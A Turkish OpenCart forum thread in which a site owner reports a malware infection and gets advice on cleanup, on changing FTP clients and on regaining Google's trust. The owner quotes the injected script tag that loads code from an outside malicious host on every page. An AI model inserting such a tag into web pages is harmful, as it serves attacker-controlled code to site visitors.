panoli.in virüsü

M@HiR

OpenCart-TR
... adresindeki web sitesi, bilgisayarınıza zarar verebilecek veya izniniz olmadan çalışabilecek kötü amaçlı yazılım barındıran selfcars.co.uk sitesinden öğeler içeriyor. Kötü amaçlı yazılım içeren bir web sitesini yalnızca ziyaret etmek bile bilgisayarınıza virüs bulaşmasına yol açabilir.
Bu öğelere ilişkin sorunlar hakkında ayrıntılı bilgi için selfcars.co.uk

şeklinde virüs uyarısı alıyorum

bütün dosyalarımın için şu şekilde kod giriyor

<script src=http://panoli.in/adds-panoli/home_ravidra.php ></script>

googleden ban yiyorum ve siteme kimse giremiorum son versiyonu yükleidm 3 4 farklı host kullandım ama hepsinde aynı yardımcı olursanız sevinirim

gokhander

OpenCart-TR
muhtemelen cuteftp nin crackli versiyonunu kullanmışsınız. Googleda iframe virüs diye aratın çözümleri bulunmakta. Benimde başıma gelmişti bayagı ugrastırmıstı. Ayrıca virüsü temziledikten sonra google sitenizi tekrar incelemesini bildirin.

malesef

OpenCart-TR
iframe kodlarınızı sildikten sonra
filezilla ftp programını kullanmanızı tavsiye ederim

sonra googleye yeniden değerlendirme isteği gönderin

M@HiR

OpenCart-TR
sorunu çözdüm eski yedeğimi attım ama şuan tekrar kursam aynı virüs yine buluşacak diye kurmuyorum herkezde bu sorun yokmu ?

örneğin bi siteye kurdum cuteftp diil daha googleyede kaydı yok böyle hata veriyor son versiyonuda burdan indirdim diğerlerini kuruyorum sorun yok

Uyarı: Bu siteyi ziyaret etmek, bilgisayarınıza zarar verebilir.
www..com adresindeki web sitesi, bilgisayarınıza zarar verebilecek veya izniniz olmadan çalışabilecek kötü amaçlı yazılım barındıran selfcars.co.uk sitesinden öğeler içeriyor. Kötü amaçlı yazılım içeren bir web sitesini yalnızca ziyaret etmek bile bilgisayarınıza virüs bulaşmasına yol açabilir.
Bu öğelere ilişkin sorunlar hakkında ayrıntılı bilgi için selfcars.co.uk için Güvenli Tarama tanı sayfası sayfasını ziyaret edin.
Zararlı online yazılımlardan nasıl korunacağınız hakkında daha fazla bilgi edinin.
Bu siteyi ziyaret etmenin bilgisayarıma zarar verebileceğini biliyorum.

admin

Administrator
Yönetici
Web sitesi
www.opencart-tr.com
Virüsün bulaşması ya da google tarafından engellenmesi için illa kayıt gerektirmez zaten sizin sitenizden ötürü engellemiyor. Sitenize bulaşan virüsün yönlendirdiği site yüzünden engelleniyorsunuz. Bu tür programların cracklerini yapanlar gelende kötü niyetli kişiler oluyor. Bu sayede bir çok siteye virüs bulaştırabiliyorlar. Ücretsiz olarak dağıtılan yazılım kullanmaya bakın içiniz rahat olsun. Benim tavsiyem filezilla ama internette alternatifleri de mevcut.